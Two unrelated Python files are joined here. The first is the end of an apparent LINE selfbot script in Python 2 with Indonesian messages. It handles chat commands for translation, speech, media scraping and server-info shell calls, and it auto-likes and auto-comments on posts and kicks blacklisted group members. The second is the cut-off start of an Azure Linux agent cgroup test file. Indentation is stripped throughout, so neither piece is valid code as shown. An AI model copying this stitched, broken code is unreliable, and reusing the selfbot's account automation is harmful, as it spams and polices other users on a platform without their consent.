elif msg.text in ["Mybackup","mybackup"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "Refreshed.")
except Exception as e:
cl.sendText(msg.to, str(e))
#==============================================================================#
elif "/fancytext: " in msg.text.lower():
txt = msg.text.replace("/fancytext: ", "")
t1 = "\xf4\x80\xb0\x82\xf4\x80\xb0\x82\xf4\x80\xb0\x82\xf4\x80\xb0\x82\xf4\x80\xa0\x81\xf4\x80\xa0\x81\xf4\x80\xa0\x81"
t2 = "\xf4\x80\x82\xb3\xf4\x8f\xbf\xbf"
cl.sendText(msg.to, t1 + txt + t2)
#-------------------------------------------------
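# Translation commands; Translator() is presumably googletrans, and each branch translates the text after the prefix to the target language.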
elif "/translate" in msg.text:
cl.sendText(msg.to,"contoh :\n- id to english : /en aku\n- english to id : /id you\n- id to japan : /jp halo\n- japan to id : /jpid kimochi\n- id to korea : /kor pagi\n- id to malaysia : /malay enak\n- id to arab : /arab jalan\n- id to jawa : /jawa kamu")
elif "/id " in msg.text:
isi = msg.text.replace("/id ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "/en " in msg.text:
isi = msg.text.replace("/en ","")
translator = Translator()
hasil = translator.translate(isi, dest='en')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "/jp " in msg.text:
isi = msg.text.replace("/jp ","")
translator = Translator()
hasil = translator.translate(isi, dest='ja')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "/jpid " in msg.text:
isi = msg.text.replace("/jpid ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "/kor " in msg.text:
isi = msg.text.replace("/kor ","")
translator = Translator()
hasil = translator.translate(isi, dest='ko')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "/malay " in msg.text:
isi = msg.text.replace("/malay ","")
translator = Translator()
hasil = translator.translate(isi, dest='ms')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "/arab " in msg.text:
isi = msg.text.replace("/arab ","")
translator = Translator()
hasil = translator.translate(isi, dest='ar')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "/jawa " in msg.text:
isi = msg.text.replace("/jawa ","")
translator = Translator()
hasil = translator.translate(isi, dest='jw')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
#---------------------------------------------------------------
elif "/removechat" in msg.text.lower():
try:
cl.removeAllMessages(op.param2)
print "[Command] Remove Chat"
cl.sendText(msg.to,"Done")
except Exception as error:
print error
cl.sendText(msg.to,"Error")
#---------------------------------------------------------
elif msg.text.lower() == 'welcome':
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
jawaban1 = ("Selamat Datang Di Grup " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
elif "Say-id " in msg.text:
say = msg.text.replace("Say-id ","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif "Say-en " in msg.text:
say = msg.text.replace("Say-en ","")
lang = 'en'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif "Say-jp " in msg.text:
say = msg.text.replace("Say-jp ","")
lang = 'ja'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif "Say-ar " in msg.text:
say = msg.text.replace("Say-ar ","")
lang = 'ar'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif "Say-ko " in msg.text:
say = msg.text.replace("Say-ko ","")
lang = 'ko'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif "Kapan " in msg.text:
tanya = msg.text.replace("Kapan ","")
jawab = ("kapan kapan","besok","satu abad lagi","Hari ini","Tahun depan","Minggu depan","Bulan depan","Sebentar lagi")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='id')
tts.save('tts.mp3')
cl.sendAudio(msg.to,'tts.mp3')
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak","Mungkin","Bisa jadi")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='id')
tts.save('tts.mp3')
cl.sendAudio(msg.to,'tts.mp3')
elif '/video ' in msg.text:
try:
textToSearch = (msg.text).replace('/video ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class': 'yt-uix-tile-link'})
ght = ('https://www.youtube.com' + results['href'])
cl.sendVideoWithURL(msg.to, ght)
except:
cl.sendText(msg.to, "Could not find it")
elif "/youtube " in msg.text:
query = msg.text.replace("/youtube ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
hasil = ""
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
hasil += ''.join((a['title'],'\nUrl : http://www.youtube.com' + a['href'],'\n\n'))
cl.sendText(msg.to,hasil)
print '[Command] Youtube Search'
elif "Lirik " in msg.text:
try:
songname = msg.text.replace("Lirik ","")
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif "Wikipedia " in msg.text:
try:
wiki = msg.text.replace("Wikipedia ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif "Music " in msg.text:
try:
songname = msg.text.replace("Music ","")
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[4])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif "Image " in msg.text:
search = msg.text.replace("Image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
cl.sendImageWithURL(msg.to,path)
except:
pass
elif "/cekig " in msg.text:
try:
instagram = msg.text.replace("/cekig ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['user']['full_name'])
bioIG = str(data['user']['biography'])
mediaIG = str(data['user']['media']['count'])
verifIG = str(data['user']['is_verified'])
usernameIG = str(data['user']['username'])
followerIG = str(data['user']['followed_by']['count'])
profileIG = data['user']['profile_pic_url_hd']
privateIG = str(data['user']['is_private'])
followIG = str(data['user']['follows']['count'])
link = "Link: " + "https://www.instagram.com/" + instagram
text = "Name : "+namaIG+"\nUsername : "+usernameIG+"\nBiography : "+bioIG+"\nFollower : "+followerIG+"\nFollowing : "+followIG+"\nPost : "+mediaIG+"\nVerified : "+verifIG+"\nPrivate : "+privateIG+"" "\n" + link
cl.sendText(msg.to, str(text))
cl.sendImageWithURL(msg.to, profileIG)
except Exception as e:
cl.sendText(msg.to, str(e))
elif "/postig" in msg.text:
separate = msg.text.split(" ")
user = msg.text.replace(separate[0] + " ","")
if user.startswith("@"):
user = user.replace("@","")
profile = "https://www.instagram.com/" + user
with requests.session() as x:
x.headers['user-agent'] = 'Mozilla/5.0'
end_cursor = ''
for count in range(1, 999):
print('PAGE: ', count)
r = x.get(profile, params={'max_id': end_cursor})
data = re.search(r'window._sharedData = (\{.+?});</script>', r.text).group(1)
j = json.loads(data)
for node in j['entry_data']['ProfilePage'][0]['user']['media']['nodes']:
if node['is_video']:
page = 'https://www.instagram.com/p/' + node['code']
r = x.get(page)
url = re.search(r'"video_url": "([^"]+)"', r.text).group(1)
print(url)
cl.sendVideoWithURL(msg.to,url)
else:
print (node['display_src'])
cl.sendImageWithURL(msg.to,node['display_src'])
end_cursor = re.search(r'"end_cursor": "([^"]+)"', r.text).group(1)
elif msg.text.lower() == 'time':
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
# map the zero-padded month number to its Indonesian name
bln = bulan[int(bln) - 1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + bln + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]"
cl.sendText(msg.to, rst)
elif "Checkdate " in msg.text:
tanggal = msg.text.replace("Checkdate ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendText(msg.to,"============ I N F O R M A S I ============\n"+"Date Of Birth : "+lahir+"\nAge : "+usia+"\nUltah : "+ultah+"\nZodiak : "+zodiak+"\n============ I N F O R M A S I ============")
elif msg.text.lower() == 'kalender':
wait2['setTime'][msg.to] = datetime.today().strftime('TANGGAL : %Y-%m-%d \nHARI : %A \nJAM : %H:%M:%S')
cl.sendText(msg.to, "KALENDER\n\n" + (wait2['setTime'][msg.to]))
#==============================================================================#
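# Server info commands shell out via subprocess and assume a Linux host with ifconfig, df, uname and /proc available.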
elif msg.text.lower() == 'ifconfig':
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif msg.text.lower() == 'reboot':
print "[Command]Restart"
try:
cl.sendText(msg.to,"Restarting...")
cl.sendText(msg.to,"Restart Success")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
elif "Turn off" in msg.text:
try:
import sys
sys.exit()
except:
pass
elif msg.text.lower() == 'runtime':
cl.sendText(msg.to,"「Please wait..」\nType :Loading...\nStatus : Loading...")
eltime = time.time() - mulai
van = "Type : Bot Sedang Berjalan \nStatus : Aktif \nBot sudah berjalan selama"+waktu(eltime)
cl.sendText(msg.to,van)
#==============================================================================#
#==============================================================================#
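# Blacklist management: Ban/Unban resolve a display name (or mention) to a mid and store it in wait["blacklist"].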
elif "Ban @" in msg.text:
if msg.toType == 2:
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip()
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,_nametarget + " Not Found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
cl.sendText(msg.to,_nametarget + " Succes Add to Blacklist")
except:
cl.sendText(msg.to,"Error")
elif "Unban @" in msg.text:
if msg.toType == 2:
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip()
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,_nametarget + " Not Found")
else:
for target in targets:
try:
del wait["blacklist"][target]
cl.sendText(msg.to,_nametarget + " Delete From Blacklist")
except:
cl.sendText(msg.to,_nametarget + " Not In Blacklist")
elif "Ban:" in msg.text:
nk0 = msg.text.replace("Ban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,_name + " Succes Add to Blacklist")
except:
cl.sendText(msg.to,"Error")
elif "Unban:" in msg.text:
nk0 = msg.text.replace("Unban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,_name + " Delete From Blacklist")
except:
cl.sendText(msg.to,_name + " Not In Blacklist")
elif msg.text in ["Clear"]:
wait["blacklist"] = {}
cl.sendText(msg.to,"Blacklist Telah Dibersihkan")
elif msg.text.lower() == 'ban:on':
wait["wblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text.lower() == 'unban:on':
wait["dblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text in ["Banlist"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Banlist")
num=1
msgs="══════════List Blacklist═════════"
for mi_d in wait["blacklist"]:
msgs+="\n[%i] %s" % (num, cl.getContact(mi_d).displayName)
num=(num+1)
msgs+="\n══════════List Blacklist═════════\n\nTotal Blacklist : %i" % len(wait["blacklist"])
cl.sendText(msg.to, msgs)
elif msg.text in ["Conban","Contactban","Contact ban"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Blacklist")
h = ""
for i in wait["blacklist"]:
h = cl.getContact(i)
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': i}
cl.sendMessage(M)
elif msg.text in ["Midban","Mid ban"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list += [gmid for gmid in gMembMids if gmid == tag]
num=1
cocoa = "══════════List Blacklist═════════"
for mm in matched_list:
cocoa+="\n[%i] %s" % (num, mm)
num=(num+1)
cocoa+="\n═════════List Blacklist═════════\n\nTotal Blacklist : %i" % len(matched_list)
cl.sendText(msg.to,cocoa)
elif msg.text.lower() == 'scan blacklist':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list += [gmid for gmid in gMembMids if gmid == tag]
if matched_list == []:
cl.sendText(msg.to,"Tidak ada Daftar Blacklist")
return
for jj in matched_list:
try:
cl.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#==============================================#
if op.type == 17:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
if wait["protect"] == True:
if wait["blacklist"][op.param2] == True:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
pass
if op.type == 19:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["protect"] == True:
wait ["blacklist"][op.param2] = True
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param2])
if op.type == 13:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.kickoutFromGroup(op.param1,[op.param2])
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["cancelprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
if op.type == 11:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["linkprotect"] == True:
wait ["blacklist"][op.param2] = True
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
cl.updateGroup(G)
cl.kickoutFromGroup(op.param1,[op.param2])
if op.type == 5:
if wait["autoAdd"] == True:
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 11:
if wait["linkprotect"] == True:
if op.param2 not in Bots:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
cl.kickoutFromGroup(op.param1,[op.param3])
cl.updateGroup(G)
#==============================================================================#
#------------------------------------------------------------------------------#
#==============================================================================#
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
if op.param2 in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += op.param2
wait2['ROM'][op.param1][op.param2] = op.param2
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
else:
pass
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
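# Background auto-like worker: polls the timeline via cl.activity() and, depending on the
# wait["likeOn"] / wait["commentOn"] flags, likes and/or comments on posts that have not
# been liked yet. The thread gives up once its error counter reaches 50.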
def autolike():
count = 1
while True:
try:
for posts in cl.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
if wait["likeOn"] == True:
cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
print "Like"
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
thread2 = threading.Thread(target=autolike)
thread2.daemon = True
thread2.start()
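# likefriend(): scans the 20 most recent timeline posts and likes any that are not yet liked.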
def likefriend():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
print "Like"
except:
pass
else:
print "Already Liked"
time.sleep(0.60)
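# likeme(): same scan as likefriend(), but only likes posts whose author mid matches this account's mid.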
def likeme():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
if hasil['result']['posts'][zx]['userInfo']['mid'] in mid:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
print "Like"
except:
pass
else:
print "Status Sudah di Like"
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
test_cgroupconfigurator.py
|
# Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.4+ and Openssl 1.0+
#
from __future__ import print_function
import contextlib
import os
import random
import re
import subprocess
import tempfile
import time
import threading
from nose.plugins.attrib import attr
from azurelinuxagent.common import conf
from azurelinuxagent.common.cgroup import AGENT_NAME_TELEMETRY, MetricsCounter, MetricValue, MetricsCategory, CpuCgroup
from azurelinuxagent.common.cgroupconfigurator import CGroupConfigurator, _AGENT_THROTTLED_TIME_THRESHOLD, \
DisableCgroups
from azurelinuxagent.common.cgroupstelemetry import CGroupsTelemetry
from azurelinuxagent.common.event import WALAEventOperation
from azurelinuxagent.common.exception import CGroupsException, ExtensionError, ExtensionErrorCodes
from azurelinuxagent.common.future import ustr
from azurelinuxagent.common.utils import shellutil, fileutil
from tests.common.mock_environment import MockCommand
from tests.common.mock_cgroup_environment import mock_cgroup_environment, UnitFilePaths
from tests.tools import AgentTestCase, patch, mock_sleep, i_am_root, data_dir
from tests.utils.miscellaneous_tools import format_processes, wait_for
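# These tests exercise CGroupConfigurator against a mocked cgroup/systemd environment
# (mock_cgroup_environment); no real systemd units or cgroup files are modified.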
class CGroupConfiguratorSystemdTestCase(AgentTestCase):
@classmethod
def tearDownClass(cls):
CGroupConfigurator._instance = None
AgentTestCase.tearDownClass()
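# Helper: creates a fresh CGroupConfigurator inside a mocked cgroup environment.
# mock_commands lets individual tests override the output of shell commands
# (for example 'mount -t cgroup'); enable=False initializes without enabling cgroups.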
@contextlib.contextmanager
def _get_cgroup_configurator(self, initialize=True, enable=True, mock_commands=None):
CGroupConfigurator._instance = None
configurator = CGroupConfigurator.get_instance()
CGroupsTelemetry.reset()
with mock_cgroup_environment(self.tmp_dir) as mock_environment:
if mock_commands is not None:
for command in mock_commands:
mock_environment.add_command(command)
configurator.mocks = mock_environment
if initialize:
if not enable:
with patch.object(configurator, "enable"):
configurator.initialize()
else:
configurator.initialize()
yield configurator
def test_initialize_should_enable_cgroups(self):
with self._get_cgroup_configurator() as configurator:
self.assertTrue(configurator.enabled(), "cgroups were not enabled")
def test_initialize_should_start_tracking_the_agent_cgroups(self):
with self._get_cgroup_configurator() as configurator:
tracked = CGroupsTelemetry._tracked
self.assertTrue(configurator.enabled(), "Cgroups should be enabled")
self.assertTrue(any(cg for cg in tracked.values() if cg.name == AGENT_NAME_TELEMETRY and 'cpu' in cg.path),
"The Agent's CPU is not being tracked. Tracked: {0}".format(tracked))
def test_initialize_should_start_tracking_other_controllers_when_one_is_not_present(self):
command_mocks = [MockCommand(r"^mount -t cgroup$",
'''cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)
cgroup on /sys/fs/cgroup/rdma type cgroup (rw,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
''')]
with self._get_cgroup_configurator(mock_commands=command_mocks) as configurator:
tracked = CGroupsTelemetry._tracked
self.assertTrue(configurator.enabled(), "Cgroups should be enabled")
self.assertFalse(any(cg for cg in tracked.values() if cg.name == 'walinuxagent.service' and 'memory' in cg.path),
"The Agent's memory should not be tracked. Tracked: {0}".format(tracked))
def test_initialize_should_not_enable_cgroups_when_the_cpu_and_memory_controllers_are_not_present(self):
command_mocks = [MockCommand(r"^mount -t cgroup$",
'''cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)
cgroup on /sys/fs/cgroup/rdma type cgroup (rw,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
''')]
with self._get_cgroup_configurator(mock_commands=command_mocks) as configurator:
tracked = CGroupsTelemetry._tracked
self.assertFalse(configurator.enabled(), "Cgroups should not be enabled")
self.assertEqual(len(tracked), 0, "No cgroups should be tracked. Tracked: {0}".format(tracked))
def test_initialize_should_not_enable_cgroups_when_the_agent_is_not_in_the_system_slice(self):
command_mocks = [MockCommand(r"^mount -t cgroup$",
'''cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)
cgroup on /sys/fs/cgroup/rdma type cgroup (rw,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
''')]
with self._get_cgroup_configurator(mock_commands=command_mocks) as configurator:
tracked = CGroupsTelemetry._tracked
agent_drop_in_file_cpu_quota = configurator.mocks.get_mapped_path(UnitFilePaths.cpu_quota)
self.assertFalse(configurator.enabled(), "Cgroups should not be enabled")
self.assertEqual(len(tracked), 0, "No cgroups should be tracked. Tracked: {0}".format(tracked))
self.assertFalse(os.path.exists(agent_drop_in_file_cpu_quota), "{0} should not have been created".format(agent_drop_in_file_cpu_quota))
def test_initialize_should_not_create_unit_files(self):
with self._get_cgroup_configurator() as configurator:
# get the paths to the mocked files
azure_slice_unit_file = configurator.mocks.get_mapped_path(UnitFilePaths.azure)
extensions_slice_unit_file = configurator.mocks.get_mapped_path(UnitFilePaths.vmextensions)
agent_drop_in_file_slice = configurator.mocks.get_mapped_path(UnitFilePaths.slice)
agent_drop_in_file_cpu_accounting = configurator.mocks.get_mapped_path(UnitFilePaths.cpu_accounting)
# The mock creates the slice unit files; delete them
os.remove(azure_slice_unit_file)
os.remove(extensions_slice_unit_file)
# The service file for the agent includes settings for the slice and cpu accounting, but not for cpu quota; initialize()
# should not create drop in files for the first 2, but it should create one for the cpu quota
self.assertFalse(os.path.exists(azure_slice_unit_file), "{0} should not have been created".format(azure_slice_unit_file))
self.assertFalse(os.path.exists(extensions_slice_unit_file), "{0} should not have been created".format(extensions_slice_unit_file))
self.assertFalse(os.path.exists(agent_drop_in_file_slice), "{0} should not have been created".format(agent_drop_in_file_slice))
self.assertFalse(os.path.exists(agent_drop_in_file_cpu_accounting), "{0} should not have been created".format(agent_drop_in_file_cpu_accounting))
def test_initialize_should_create_unit_files_when_the_agent_service_file_is_not_updated(self):
with self._get_cgroup_configurator(initialize=False) as configurator:
